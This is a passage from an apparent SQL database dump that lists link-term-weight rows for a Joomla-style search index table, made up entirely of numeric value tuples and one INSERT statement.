(266, 251371, 0.93331),
(265, 251372, 0.86331),
(266, 251372, 0.86331),
(265, 251373, 0.95669),
(266, 251373, 0.95669),
(265, 251374, 0.98),
(266, 251374, 0.98),
(272, 253439, 0.98),
(280, 253439, 0.98),
(272, 253440, 1.02669),
(280, 253440, 1.02669),
(272, 253441, 1.12),
(280, 253441, 1.12),
(272, 253442, 0.93331),
(280, 253442, 0.93331),
(272, 253443, 1.05),
(280, 253443, 1.05),
(272, 253630, 1.82007),
(280, 253630, 1.82007),
(272, 253631, 1.16669),
(280, 253631, 1.16669),
(272, 253632, 1.35331),
(280, 253632, 1.35331),
(272, 253633, 2.19338),
(280, 253633, 2.19338),
(272, 253634, 1.19),
(280, 253634, 1.19),
(272, 253635, 1.21331),
(280, 253635, 1.21331),
(273, 256347, 0.28),
(273, 256348, 0.93331),
(273, 256349, 1.07331),
(273, 256350, 0.14),
(273, 256351, 0.86331),
(273, 256352, 0.95669),
(273, 256353, 0.91),
(273, 256354, 1.07331),
(273, 256355, 1.12),
(273, 256356, 1.02669),
(273, 256357, 1.09669),
(273, 256358, 0.88669),
(273, 256359, 1.07331),
(273, 256360, 0.95669),
(273, 256361, 1.02669),
(273, 256550, 1.05),
(233, 266598, 0.86331),
(233, 266599, 0.98),
(233, 266600, 0.23331),
(233, 266601, 0.93331),
(233, 266602, 1.02669),
(233, 266603, 0.95669),
(233, 266692, 1.02669),
(233, 266693, 1.12),
(233, 266694, 0.88669),
(288, 266694, 0.88669),
(233, 266695, 0.98),
(235, 267845, 0.46669),
(235, 267846, 1.00331),
(235, 267847, 1.23669),
(235, 267848, 0.93331),
(235, 267849, 1.02669),
(235, 267850, 1.02669),
(235, 267851, 1.00331),
(235, 267852, 1.07331),
(235, 267853, 3.15),
(235, 267854, 1.05),
(235, 267855, 0.88669),
(306, 267855, 0.88669),
(235, 267856, 0.95669),
(235, 267857, 1.09669),
(235, 267858, 1.05),
(235, 267859, 0.84),
(235, 267860, 0.93331),
(235, 267923, 1.14331),
(235, 268100, 2.00662),
(235, 268101, 1.07331),
(235, 268102, 1.19),
(235, 268103, 1.05),
(235, 268104, 1.14331),
(235, 268105, 0.42),
(235, 268106, 1.14331),
(235, 268107, 1.19),
(235, 268108, 0.95669),
(235, 268109, 1.02669),
(235, 268110, 0.91),
(235, 268111, 0.98),
(236, 268958, 0.93331),
(236, 268959, 1.00331),
(236, 268960, 0.95669),
(236, 268961, 1.05),
(236, 268962, 0.95669),
(236, 268963, 1.05),
(236, 268964, 0.32669),
(236, 268965, 1.00331),
(236, 268966, 1.14331),
(236, 269047, 0.23331),
(236, 269048, 0.93331),
(236, 269049, 1.05),
(236, 269263, 0.37331),
(236, 269264, 1.00331),
(236, 269265, 1.07331),
(236, 269266, 0.98),
(236, 269267, 1.07331),
(236, 269268, 0.81669),
(236, 269269, 0.91),
(236, 269270, 0.95669),
(236, 269271, 1.07331),
(236, 269272, 0.91),
(236, 269273, 1.05),
(237, 269712, 0.93331),
(237, 269713, 1.07331),
(237, 269714, 1.02669),
(237, 269715, 1.21331),
(237, 269716, 1.09669),
(237, 269717, 1.05),
(237, 269718, 0.95669),
(237, 269868, 2.24),
(237, 269869, 1.02669),
(237, 269870, 1.12),
(237, 269871, 0.95669),
(237, 269872, 1.07331),
(237, 269873, 0.95669),
(238, 271167, 0.93331),
(238, 271168, 1.02669),
(238, 271169, 1.09669),
(238, 271170, 1.16669),
(238, 271171, 0.91),
(238, 271172, 0.98),
(238, 271173, 1.05),
(238, 271174, 1.12),
(238, 271175, 1.02669),
(238, 271176, 0.88669),
(238, 271177, 1.00331),
(238, 271178, 0.86331),
(238, 271179, 0.95669),
(238, 271180, 1.12),
(238, 271181, 1.05),
(238, 271182, 0.86331),
(238, 271183, 1.05),
(238, 271184, 1.05),
(238, 271185, 1.23669),
(238, 271186, 0.95669),
(238, 271187, 0.95669),
(238, 271188, 0.88669),
(238, 271189, 0.98),
(238, 271190, 1.05),
(238, 271516, 1.23669),
(238, 271517, 0.93338),
(238, 271518, 1.07331),
(238, 271519, 1.14331),
(238, 271520, 1.19),
(238, 271521, 1.26),
(238, 271522, 1.09669),
(238, 271523, 0.95669),
(238, 271524, 1.16669),
(239, 273230, 1.02669),
(239, 273231, 0.95669),
(239, 273232, 1.02669),
(239, 273233, 1.96),
(239, 273234, 1.05),
(239, 273235, 1.12),
(239, 273236, 0.32669),
(239, 273237, 1.07331),
(239, 273238, 1.16669),
(239, 273239, 0.51331),
(239, 273240, 1.05),
(239, 273241, 1.16669),
(239, 273242, 0.98),
(239, 273243, 1.07331),
(239, 273244, 0.88669),
(239, 273245, 1.02669),
(239, 273246, 0.91),
(239, 273247, 1.02669),
(239, 273248, 1.02669),
(239, 273249, 1.09669),
(239, 273250, 0.86331),
(239, 273251, 0.93331),
(239, 273252, 1.00331),
(239, 273253, 1.12),
(239, 273254, 0.86331),
(239, 273255, 0.95669),
(239, 273256, 0.86331),
(239, 273257, 0.91),
(239, 273258, 0.98),
(239, 273259, 0.88669),
(239, 273260, 0.95669),
(239, 273261, 1.00331),
(239, 273262, 0.95669),
(239, 273263, 0.93331),
(239, 273395, 0.23331),
(239, 273396, 0.93331),
(239, 273397, 1.05),
(239, 273724, 0.51331),
(239, 273725, 1.00331),
(239, 273726, 1.12),
(239, 273727, 1.02669),
(292, 273727, 1.02669),
(239, 273728, 1.16669),
(239, 273729, 1.09669),
(239, 273730, 1.33),
(239, 273731, 1.19),
(239, 273732, 1.28331),
(239, 273733, 1.09669),
(239, 273734, 1.21331),
(239, 273735, 2.33338),
(239, 273736, 0.95669),
(239, 273737, 1.05),
(239, 273738, 1.07331),
(239, 273739, 0.84),
(292, 273739, 0.84),
(239, 273740, 1.05),
(239, 273741, 0.93331),
(239, 273742, 0.95669),
(239, 273743, 0.86331),
(239, 273744, 1.05),
(240, 275419, 0.93331),
(240, 275420, 1.05),
(240, 275421, 1.02662),
(240, 275422, 1.02669),
(240, 275423, 1.12),
(240, 275424, 1.07331),
(240, 275425, 1.23669),
(240, 275426, 0.93331),
(240, 275427, 1.00331),
(240, 275428, 0.88669),
(288, 275428, 0.88669),
(240, 275429, 1.14331),
(240, 275430, 1.05),
(240, 275431, 0.93331),
(240, 275432, 1.16669),
(240, 275433, 0.93331),
(240, 275434, 1.09669),
(240, 275435, 0.93331),
(240, 275436, 1.05),
(240, 275437, 0.93331),
(240, 275438, 1.05),
(240, 275439, 0.98),
(240, 275440, 1.09669),
(240, 275441, 1.05),
(240, 275442, 0.98),
(240, 275443, 0.88669),
(240, 275444, 1.05),
(240, 275445, 0.91),
(240, 275446, 1.07331),
(240, 275447, 1.05),
(240, 275448, 1.12),
(240, 275449, 0.95669),
(240, 275450, 0.95669),
(240, 275451, 1.02669),
(240, 275452, 0.93324),
(240, 275453, 0.91),
(240, 275454, 1.09669),
(240, 275455, 0.91),
(240, 275456, 1.02669),
(240, 275457, 0.88669),
(240, 275458, 1.05),
(240, 275459, 0.32669),
(240, 275460, 0.98),
(240, 275461, 1.14331),
(240, 275462, 0.98),
(240, 275463, 0.86331),
(240, 275464, 0.98),
(240, 275607, 0.98),
(240, 275608, 1.07331),
(240, 275958, 0.32669),
(240, 275959, 0.95669),
(240, 275960, 1.21331),
(240, 275961, 1.09669),
(240, 275962, 1.19),
(240, 275963, 1.21331),
(240, 275964, 1.09669),
(240, 275965, 1.21331),
(240, 275966, 0.46669),
(240, 275967, 1.02669),
(240, 275968, 1.12),
(240, 275969, 1.00331),
(240, 275970, 0.91),
(240, 275971, 0.95669),
(240, 275972, 0.42),
(240, 275973, 1.12),
(240, 275974, 1.23669),
(240, 275975, 0.93331),
(240, 275976, 1.02669),
(240, 275977, 0.28),
(240, 275978, 0.95669),
(240, 275979, 1.05),
(240, 275980, 0.37331),
(240, 275981, 0.98),
(240, 275982, 1.07331),
(240, 275983, 1.07331),
(240, 275984, 0.86331),
(240, 275985, 0.93331),
(240, 275986, 1.02669),
(240, 275987, 0.93331),
(240, 275988, 0.98),
(241, 276993, 0.98),
(241, 276994, 1.07331),
(241, 276995, 0.98),
(241, 276996, 0.95669),
(241, 276997, 1.21331),
(241, 276998, 1.02669),
(241, 276999, 0.93331),
(241, 277000, 0.95669),
(241, 277001, 0.28),
(305, 277001, 0.28),
(304, 277001, 0.56),
(241, 277002, 0.93331),
(241, 277003, 1.07331),
(241, 277004, 0.37331),
(241, 277005, 1.00331),
(241, 277006, 1.07331),
(241, 277007, 0.98),
(241, 277008, 0.95669),
(241, 277009, 0.84),
(241, 277010, 0.91),
(241, 277011, 1.00331),
(241, 277012, 0.98),
(241, 277013, 0.98),
(241, 277014, 1.09669),
(241, 277015, 0.88669),
(241, 277016, 0.98),
(241, 277017, 0.88669),
(241, 277018, 1.02669),
(241, 277278, 0.91),
(241, 277279, 1.02669),
(241, 277280, 0.91),
(241, 277281, 1.00331),
(241, 277282, 1.82),
(241, 277283, 0.98),
(241, 277284, 1.00331),
(241, 277285, 0.84),
(241, 277286, 0.98),
(241, 277287, 0.84),
(241, 277288, 0.95669),
(241, 277289, 0.93331),
(241, 277290, 0.93331),
(241, 277291, 1.02669),
(241, 277292, 0.98),
(241, 277293, 0.23331),
(241, 277294, 0.95669),
(241, 277295, 1.07331),
(242, 278707, 0.91),
(242, 278708, 1.02669),
(242, 278709, 0.86331),
(242, 278710, 0.91),
(242, 278711, 0.91),
(242, 278712, 1.00331),
(242, 278713, 1.00331),
(242, 278714, 1.02669),
(242, 278715, 0.95669),
(242, 278716, 1.14331),
(242, 278717, 1.00331),
(242, 278718, 1.12),
(242, 278719, 1.07331),
(242, 278720, 1.02669),
(242, 278721, 0.98),
(242, 278722, 1.19),
(242, 278723, 0.84),
(242, 278724, 0.91),
(242, 278725, 1.19),
(242, 278726, 0.88669),
(242, 278727, 1.12),
(242, 278728, 1.07331),
(242, 278729, 0.98),
(242, 278730, 1.00331),
(242, 278731, 0.98),
(242, 278732, 1.09669),
(242, 278733, 1.02669),
(242, 278734, 0.32669),
(242, 278735, 0.98),
(242, 278736, 1.07331),
(242, 278737, 0.98),
(242, 278738, 1.05),
(242, 278739, 1.02669),
(242, 278933, 1.19),
(242, 278934, 1.33),
(242, 279494, 1.09669),
(242, 279495, 1.33),
(242, 279496, 0.51331),
(242, 279497, 1.19),
(242, 279498, 1.37669),
(242, 279499, 0.32669),
(242, 279500, 1.05),
(242, 279501, 1.14331),
(242, 279502, 0.32669),
(242, 279503, 0.95669),
(242, 279504, 1.16669),
(242, 279505, 0.28),
(242, 279506, 0.95669),
(242, 279507, 1.07331),
(242, 279508, 0.86331),
(242, 279509, 1.00331),
(242, 279510, 0.93331),
(242, 279511, 1.02669),
(242, 279512, 0.86331),
(242, 279513, 0.91),
(242, 279514, 1.09669),
(242, 279515, 0.88669),
(242, 279516, 0.95669),
(242, 279517, 0.81669),
(242, 279518, 0.95669),
(242, 279519, 0.88669),
(242, 279520, 1.05),
(242, 279521, 2.05338),
(243, 282270, 0.91),
(243, 282271, 0.95669),
(243, 282272, 0.42),
(243, 282273, 1.00331),
(243, 282274, 1.23669),
(243, 282275, 0.86331),
(243, 282276, 1.00331),
(243, 282277, 0.93331),
(243, 282278, 1.00331),
(243, 282279, 1.05),
(243, 282280, 1.00331),
(243, 282281, 1.16669),
(243, 282282, 0.84),
(305, 282282, 0.84),
(243, 282283, 0.95669),
(243, 282284, 0.98),
(243, 282285, 1.12),
(243, 282286, 0.91),
(243, 282287, 1.05),
(243, 282288, 0.93331),
(243, 282289, 1.02669),
(243, 282290, 1.00331),
(243, 282291, 1.02669),
(243, 282292, 0.88669),
(243, 282293, 0.93331),
(243, 282294, 0.88669),
(243, 282295, 1.00331),
(243, 282296, 0.93331),
(243, 282297, 1.02669),
(243, 282298, 0.98),
(243, 282299, 0.98),
(243, 282300, 1.12),
(243, 282301, 0.91),
(243, 282302, 0.98),
(243, 282391, 0.37331),
(243, 282392, 0.95669),
(243, 282393, 1.19),
(243, 282394, 1.00331),
(243, 282395, 1.09669),
(243, 282653, 1.00331),
(243, 282654, 0.98),
(243, 282655, 0.93331),
(288, 282655, 0.93331),
(243, 282656, 0.84),
(243, 282657, 1.00331),
(244, 284144, 1.07331),
(244, 284145, 0.88669),
(244, 284146, 1.00331),
(244, 284147, 0.86331),
(244, 284148, 1.16669),
(244, 284149, 0.88669),
(244, 284150, 0.98),
(244, 284151, 0.98),
(244, 284152, 1.02669),
(244, 284430, 0.91),
(244, 284431, 1.05),
(244, 284432, 0.98),
(244, 284433, 1.07331),
(244, 284434, 0.95669),
(244, 284435, 1.07331),
(244, 284436, 3.54676),
(244, 284437, 0.95669),
(244, 284438, 0.95669),
(244, 284439, 1.02669),
(244, 284440, 0.95669),
(244, 284441, 0.84),
(244, 284442, 0.93331),
(244, 284443, 0.86331),
(244, 284444, 0.95669),
(245, 284981, 0.32669),
(245, 284982, 1.00331),
(245, 284983, 1.07331),
(245, 285130, 0.95669),
(246, 285675, 1.09669),
(246, 285676, 0.86331),
(246, 285677, 0.95669),
(246, 285678, 0.95669),
(246, 285679, 1.14331),
(246, 285680, 1.02669),
(246, 285681, 1.07331),
(246, 285682, 0.88669),
(246, 285683, 0.95669),
(246, 285684, 0.88669),
(246, 285685, 0.98),
(246, 285686, 1.05),
(246, 285687, 1.14331),
(246, 285688, 0.93331),
(246, 285889, 0.37331),
(246, 285890, 1.12),
(246, 285891, 1.30669),
(246, 285892, 0.46669),
(246, 285893, 1.07331),
(246, 285894, 1.14331),
(246, 285895, 0.98),
(247, 286639, 0.93331),
(247, 286640, 1.00331),
(247, 286641, 1.12),
(247, 286642, 0.98),
(247, 286643, 0.91),
(247, 286644, 1.00331),
(247, 286645, 0.91),
(247, 286646, 1.00331),
(247, 286647, 0.28),
(247, 286648, 0.98),
(247, 286649, 1.02669),
(247, 286785, 0.37331),
(247, 286786, 0.93331),
(247, 286787, 1.00331),
(247, 286788, 0.98),
(247, 286789, 1.12),
(247, 286790, 0.51331),
(247, 286791, 1.07331),
(247, 286792, 1.19),
(247, 286793, 1.00331),
(247, 286794, 1.07331),
(247, 286795, 0.18669),
(247, 286796, 0.88669),
(247, 286797, 0.95669),
(248, 287597, 0.91),
(248, 287598, 1.07331),
(248, 287599, 1.02669),
(248, 287600, 1.00331),
(248, 287601, 1.26),
(248, 287602, 0.93331),
(248, 287603, 1.02669),
(248, 287604, 1.00331),
(248, 287605, 1.00331),
(248, 287606, 1.07331),
(248, 287607, 0.86331),
(248, 287608, 0.95669),
(248, 287609, 0.95669),
(248, 287653, 0.42),
(248, 287654, 1.02669),
(248, 287655, 1.14331),
(248, 287770, 0.98),
(248, 287771, 1.05),
(248, 287772, 0.86331),
(248, 287773, 1.02669),
(248, 287774, 1.02669),
(249, 288652, 1.00331),
(249, 288653, 1.07331),
(249, 288654, 1.05),
(249, 288655, 0.95669),
(249, 288656, 0.14),
(249, 288657, 0.84),
(249, 288658, 0.95669),
(249, 288789, 1.02669),
(249, 288790, 0.28),
(249, 288791, 0.98),
(249, 288792, 1.14331),
(249, 288793, 0.51331),
(249, 288794, 1.05),
(249, 288795, 1.21331),
(249, 288796, 0.37331),
(249, 288797, 0.95669),
(249, 288798, 1.05),
(249, 288799, 0.98),
(249, 288800, 0.91),
(249, 288801, 1.00331),
(249, 288802, 1.05),
(249, 288803, 0.23331),
(249, 288804, 1.09669),
(249, 288805, 1.14331),
(251, 289471, 0.42),
(251, 289472, 2.79993),
(251, 289473, 3.15),
(252, 289815, 1.02669),
(252, 289816, 1.14331),
(252, 289817, 1.12),
(252, 289818, 1.23669),
(252, 289819, 1.07331),
(252, 289820, 1.07331),
(252, 289821, 0.91),
(252, 289822, 1.00331),
(252, 289823, 0.91),
(252, 289824, 1.00331),
(252, 289825, 0.98),
(252, 289826, 1.07331),
(252, 289827, 0.95669),
(252, 289828, 1.09669),
(252, 289829, 0.93331),
(252, 289830, 1.02669),
(252, 289831, 0.98),
(252, 289832, 1.05),
(252, 289833, 0.98),
(252, 289834, 0.88669),
(252, 289835, 1.05),
(252, 289836, 0.93331),
(252, 290015, 0.42),
(252, 290016, 1.09669),
(252, 290017, 1.19),
(252, 290018, 1.02669),
(252, 290019, 0.93331),
(252, 290020, 0.93331),
(252, 290021, 0.84),
(252, 290022, 0.98),
(252, 290023, 1.07331),
(253, 290923, 0.93331),
(253, 290924, 1.02669),
(253, 290925, 1.00331),
(253, 290926, 1.07331),
(253, 290927, 0.18669),
(253, 290928, 0.86331),
(253, 290929, 0.93331),
(253, 290930, 0.93331),
(253, 290931, 0.91),
(253, 290932, 0.98),
(253, 291174, 0.84),
(253, 291175, 0.93331),
(253, 291176, 0.81669),
(253, 291177, 0.93331),
(253, 291178, 0.23331),
(253, 291179, 0.93331),
(253, 291180, 1.12),
(254, 292116, 0.91),
(254, 292117, 1.00331),
(254, 292118, 0.88669),
(254, 292119, 1.02669),
(254, 292120, 0.95669),
(254, 292121, 1.12),
(254, 292122, 0.88669),
(254, 292123, 1.12),
(254, 292124, 0.98),
(254, 292125, 0.91),
(254, 292126, 1.05),
(254, 292127, 0.88669),
(254, 292128, 1.05),
(254, 292129, 0.93331),
(254, 292130, 0.98),
(254, 292131, 0.95669),
(254, 292132, 1.16669),
(254, 292133, 1.05),
(254, 292134, 0.95669),
(254, 292135, 1.77338),
(254, 292136, 0.95669),
(254, 292137, 0.98),
(254, 292138, 0.88669),
(254, 292139, 0.98),
(254, 292140, 0.98),
(254, 292141, 1.07331),
(254, 292142, 0.86331),
(254, 292143, 0.95669),
(254, 292144, 0.32669),
(254, 292145, 1.07331),
(254, 292146, 1.14331),
(254, 292463, 0.86331),
(254, 292464, 0.95669),
(254, 292465, 1.05),
(254, 292466, 0.79331),
(254, 292467, 0.88669),
(254, 292468, 0.84),
(254, 292469, 0.98),
(254, 292470, 1.00331),
(254, 292471, 1.12),
(255, 292876, 1.33),
(255, 292877, 0.93331),
(255, 292878, 1.07331),
(255, 292879, 0.95669),
(255, 292880, 1.09669),
(255, 292881, 0.93331),
(255, 292882, 0.86331),
(255, 292883, 0.98),
(255, 292884, 0.98),
(255, 292885, 1.09669),
(255, 292886, 0.98),
(255, 292887, 1.12),
(255, 292888, 0.88669),
(255, 292889, 1.00331),
(255, 292890, 0.95669),
(255, 293025, 1.26),
(255, 293026, 0.95669),
(255, 293027, 1.02669),
(255, 293028, 1.02669),
(255, 293029, 1.00331),
(255, 293030, 0.98),
(255, 293031, 0.98),
(255, 293032, 0.91),
(255, 293033, 1.12),
(256, 293478, 0.95669),
(256, 293479, 1.05),
(256, 293480, 0.37331),
(256, 293481, 1.00331),
(256, 293482, 1.07331),
(256, 293483, 0.98),
(256, 293484, 1.07331),
(256, 293485, 0.98),
(256, 293486, 1.05),
(256, 293487, 2.87007),
(256, 293488, 1.16669),
(256, 293489, 1.21331),
(256, 293490, 1.07331),
(256, 293491, 1.05),
(256, 293492, 1.02669),
(256, 293493, 1.02669),
(256, 293494, 0.91),
(256, 293495, 1.00331),
(256, 293496, 1.02669),
(256, 293497, 1.00331),
(256, 293498, 0.88669),
(256, 293499, 1.00331),
(256, 293500, 0.88669),
(256, 293501, 1.05),
(256, 293502, 2.00662),
(256, 293503, 1.14331),
(256, 293504, 1.12),
(256, 293505, 0.98),
(256, 293506, 0.98),
(256, 293507, 0.98),
(256, 293508, 0.42),
(256, 293509, 1.02669),
(256, 293510, 1.23669),
(256, 293695, 1.09669),
(256, 293696, 0.86331),
(256, 293697, 0.93331),
(256, 293698, 1.14331),
(256, 293699, 0.84),
(256, 293700, 0.98),
(257, 294474, 0.93331),
(257, 294475, 1.14331),
(257, 294476, 0.91),
(257, 294477, 1.02669),
(257, 294478, 0.98),
(257, 294479, 1.00331),
(257, 294667, 1.12),
(257, 294668, 0.95669),
(258, 295514, 0.98),
(258, 295515, 1.09669),
(258, 295516, 0.98),
(258, 295517, 1.14331),
(258, 295518, 1.05),
(258, 295519, 0.95669),
(258, 295520, 1.07331),
(258, 295521, 1.09669),
(258, 295522, 1.16669),
(258, 295523, 1.00331),
(258, 295524, 0.93331),
(258, 295525, 1.00331),
(258, 295526, 0.93331),
(258, 295527, 1.02669),
(258, 295528, 0.95669),
(258, 295529, 1.19),
(258, 295530, 1.00331),
(258, 295531, 1.07331),
(258, 295532, 1.00331),
(258, 295764, 0.88669),
(258, 295765, 0.98),
(258, 295766, 0.84),
(258, 295767, 0.98),
(258, 295768, 1.00331),
(258, 295769, 0.86331),
(292, 295769, 0.86331),
(258, 295770, 0.98),
(292, 295770, 0.98),
(258, 295771, 0.91),
(261, 296659, 1.00331),
(261, 296660, 1.09669),
(261, 296661, 1.05),
(261, 296662, 1.09669),
(261, 296663, 1.00331),
(261, 296664, 0.95669),
(261, 296665, 0.88669),
(261, 296666, 0.95669),
(261, 296667, 0.91),
(261, 296668, 1.00331),
(261, 296669, 1.07331),
(261, 296670, 1.86662),
(261, 296671, 2.42662),
(261, 296672, 0.91),
(261, 296673, 0.98),
(261, 296674, 0.95669),
(261, 296865, 1.02669),
(261, 296866, 0.98),
(261, 296867, 1.14331),
(261, 296868, 0.93331),
(261, 296869, 0.79331),
(261, 296870, 0.86331),
(261, 296871, 0.86331),
(261, 296872, 0.98),
(262, 297810, 0.98),
(262, 297811, 1.05),
(262, 297812, 0.95669),
(262, 297813, 1.07331),
(262, 297814, 0.32669),
(262, 297815, 0.95669),
(262, 297816, 1.12),
(262, 297817, 1.00331),
(262, 297818, 1.09669),
(262, 297819, 0.88669),
(262, 297820, 0.95669),
(262, 298200, 1.12),
(262, 298201, 0.81669),
(262, 298202, 0.93331),
(262, 298203, 0.95669),
(262, 298204, 1.07331),
(262, 298205, 0.95669),
(262, 298206, 0.91),
(262, 298207, 1.02669),
(262, 298208, 0.93331),
(262, 298209, 1.02669),
(263, 299760, 1.09669),
(263, 299761, 1.21331),
(263, 299762, 1.09669),
(263, 299763, 1.12),
(263, 299764, 1.07331),
(263, 299765, 1.19),
(263, 299766, 1.12),
(263, 299767, 0.95669),
(263, 299768, 1.14331),
(263, 299769, 1.05),
(263, 299770, 1.21331),
(263, 299771, 0.95669),
(263, 299772, 1.09669),
(263, 299773, 0.93331),
(263, 299774, 1.02669),
(263, 299775, 0.91),
(263, 299776, 1.05),
(263, 300015, 0.37331),
(263, 300016, 1.14331),
(263, 300017, 1.21331),
(263, 300018, 1.02669),
(263, 300019, 1.14331),
(263, 300020, 1.23669),
(263, 300021, 0.23331),
(263, 300022, 0.88669),
(263, 300023, 1.09669),
(263, 300024, 0.60669),
(263, 300025, 1.07331),
(263, 300026, 1.16669),
(263, 300027, 0.79331),
(263, 300028, 0.88669),
(263, 300029, 1.02669),
(263, 300030, 0.91),
(263, 300031, 1.05),
(264, 300575, 1.02669),
(264, 300576, 0.91),
(264, 300577, 1.09669),
(264, 300578, 0.93331),
(264, 300579, 1.02669),
(264, 300580, 1.82),
(264, 300581, 1.00331),
(264, 300582, 0.98),
(264, 300583, 0.86331),
(264, 300584, 1.05),
(264, 300585, 0.95669),
(264, 300586, 1.05),
(264, 300587, 0.93331),
(264, 300588, 1.02669),
(264, 300589, 1.00331),
(264, 300590, 1.09669),
(264, 300591, 0.98),
(264, 300592, 1.07331),
(264, 300593, 0.91),
(264, 300594, 1.00331),
(264, 300595, 0.88669),
(264, 300596, 1.12),
(264, 300780, 0.42),
(264, 300781, 1.07331),
(264, 300782, 1.16669),
(267, 301272, 0.18669),
(267, 301273, 0.86331),
(267, 301274, 0.95669),
(267, 301275, 0.93331),
(267, 301276, 1.05),
(267, 301277, 0.88669),
(267, 301278, 1.00331),
(267, 301279, 0.88669),
(267, 301280, 0.95669),
(267, 301281, 1.00331),
(267, 301282, 1.68),
(267, 301283, 0.93331),
(267, 301284, 0.93331),
(267, 301285, 0.91),
(267, 301286, 1.02669),
(267, 301287, 0.95669),
(268, 302298, 3.21993),
(268, 302299, 1.16669),
(268, 302300, 1.19),
(268, 302301, 1.19),
(268, 302302, 0.95669),
(268, 302303, 1.05),
(268, 302304, 0.98),
(268, 302305, 1.07331),
(268, 302306, 0.81669),
(268, 302307, 0.95669),
(268, 302308, 0.95669),
(268, 302309, 1.14331),
(268, 302310, 0.91),
(268, 302311, 1.02669),
(268, 302312, 0.93331),
(268, 302313, 1.05),
(268, 302314, 0.88669),
(268, 302315, 0.98),
(268, 302316, 1.02669),
(268, 302317, 1.14331),
(268, 302318, 1.12),
(268, 302319, 0.91),
(268, 302320, 1.00331),
(268, 302321, 0.91),
(268, 302322, 1.00331),
(268, 302323, 0.88669),
(268, 302324, 1.00331),
(268, 302325, 0.84),
(268, 302326, 0.95669),
(268, 302327, 2.73),
(268, 302328, 2.1),
(268, 302329, 1.09669),
(268, 302330, 1.00331),
(268, 302392, 0.37338),
(268, 302393, 2.00662),
(268, 302394, 1.07331),
(268, 302395, 1.12),
(268, 302565, 0.91),
(268, 302566, 1.07331),
(268, 302567, 0.86331),
(268, 302568, 1.02669),
(268, 302569, 0.95669),
(268, 302570, 0.93331),
(268, 302571, 1.00331),
(269, 303257, 0.37331),
(269, 303258, 1.00331),
(269, 303259, 1.09669),
(269, 303260, 1.05),
(269, 303261, 1.91338),
(269, 303262, 1.02669),
(269, 303263, 1.07331),
(269, 303264, 1.02669),
(269, 303265, 0.95669),
(269, 303266, 1.00331),
(269, 303267, 1.07331),
(269, 303268, 1.00331),
(269, 303269, 1.07331),
(269, 303270, 0.91),
(306, 303270, 0.91),
(269, 303271, 0.98),
(306, 303271, 0.98),
(269, 303272, 1.00331),
(269, 303273, 0.95669),
(269, 303274, 0.93331),
(269, 303323, 0.32669),
(269, 303324, 0.95669),
(269, 303325, 1.05),
(269, 303326, 0.23331),
(269, 303327, 0.93331),
(269, 303328, 0.98),
(269, 303442, 1.00331),
(269, 303443, 0.98),
(269, 303444, 0.91),
(269, 303445, 1.86662),
(274, 304374, 0.93331),
(274, 304375, 1.14331),
(274, 304376, 0.93331),
(274, 304377, 1.05),
(274, 304378, 1.19),
(274, 304379, 1.30669),
(274, 304380, 0.88669),
(274, 304381, 0.98),
(274, 304382, 1.77338),
(274, 304383, 0.98),
(274, 304384, 0.98),
(274, 304385, 0.95669),
(274, 304501, 0.23331),
(306, 304501, 0.46662),
(274, 304502, 0.88669),
(274, 304503, 0.98),
(274, 304504, 1.02669),
(274, 304505, 1.19),
(274, 304648, 0.46669),
(290, 304648, 0.46669),
(274, 304649, 1.05),
(290, 304649, 1.05),
(274, 304650, 1.16669),
(274, 304651, 0.88669),
(274, 304652, 1.12),
(274, 304653, 2.14662),
(274, 304654, 0.37331),
(274, 304655, 1.07331),
(274, 304656, 1.19),
(275, 305298, 0.04669),
(275, 305299, 0.79331),
(275, 305300, 0.88669),
(275, 305301, 0.42),
(275, 305302, 0.98),
(275, 305303, 1.30669),
(275, 305304, 0.98),
(275, 305305, 0.98),
(275, 305306, 0.93331),
(275, 305307, 1.02669),
(275, 305308, 0.91),
(275, 305490, 1.21331),
(275, 305491, 0.91),
(275, 305492, 1.07331),
(275, 305493, 0.32669),
(275, 305494, 1.05),
(275, 305495, 1.26),
(280, 307602, 0.93331),
(287, 312916, 0.14),
(287, 312917, 0.84),
(287, 312918, 1.07331),
(287, 312942, 0.32669),
(287, 312943, 1.12),
(287, 312944, 1.21331),
(287, 312945, 1.07331),
(287, 312946, 1.14331),
(287, 313004, 0.18669),
(287, 313005, 0.95669),
(287, 313006, 1.00331),
(288, 313662, 0.91),
(305, 313662, 0.91),
(288, 313663, 1.02669),
(305, 313663, 1.02669),
(288, 313664, 0.93331),
(288, 313665, 0.98),
(288, 313666, 1.05),
(288, 313667, 0.88669),
(288, 313668, 1.02669),
(288, 313669, 1.77338),
(288, 313670, 2.00662),
(288, 313671, 0.98),
(288, 313672, 0.84),
(288, 313673, 0.93331),
(288, 313674, 0.98),
(288, 313675, 1.05),
(288, 313676, 0.98),
(288, 313677, 1.09669),
(288, 313895, 0.56),
(288, 313896, 1.07331),
(288, 313897, 1.16669),
(288, 313898, 0.65331),
(288, 313899, 1.12),
(288, 313900, 1.4),
(288, 313901, 0.79331),
(288, 313902, 0.93331),
(288, 313903, 1.00331),
(290, 315595, 0.98),
(290, 315596, 0.98),
(290, 315597, 1.12),
(290, 315598, 1.86662),
(290, 315599, 1.14331),
(290, 315600, 1.05),
(290, 315601, 2.52),
(290, 315602, 0.93331),
(290, 315603, 1.91338),
(290, 315604, 0.98),
(290, 315605, 0.84),
(290, 315606, 0.91),
(290, 315607, 0.93331),
(290, 315608, 1.05),
(290, 315798, 1.12),
(290, 315799, 0.98),
(290, 315800, 0.84),
(292, 315800, 0.84),
(290, 315801, 0.91),
(292, 315801, 0.91),
(290, 315802, 0.95669),
(292, 317765, 0.98),
(292, 317766, 0.88669),
(292, 317767, 1.07331),
(292, 317768, 0.93331),
(292, 317769, 1.07331),
(292, 317770, 0.93331),
(292, 317771, 1.09669),
(292, 317772, 0.98),
(292, 317773, 0.91),
(306, 317773, 0.91),
(292, 317774, 1.05),
(292, 317775, 1.00331),
(292, 317776, 0.88669),
(292, 317777, 0.95669),
(292, 317778, 0.93331),
(292, 317779, 1.05),
(292, 317780, 1.02669),
(292, 317781, 1.12),
(292, 317782, 0.84),
(292, 317783, 0.95669),
(292, 318071, 0.04669),
(292, 318072, 0.77),
(292, 318073, 0.84),
(292, 318074, 1.00331),
(292, 318075, 1.07331),
(292, 318076, 1.16669),
(292, 318077, 0.81669);
INSERT INTO `y57u5_finder_links_terms7` (`link_id`, `term_id`, `weight`) VALUES
(292, 318078, 0.95669),
(292, 318079, 0.86331),
(292, 318080, 1.05),
(292, 318081, 0.86331),
(292, 318082, 0.93331),
(292, 318083, 0.93331),
(292, 318084, 0.95669),
(292, 318085, 1.14331),
(294, 318463, 2.56),
(294, 318464, 8.53312),
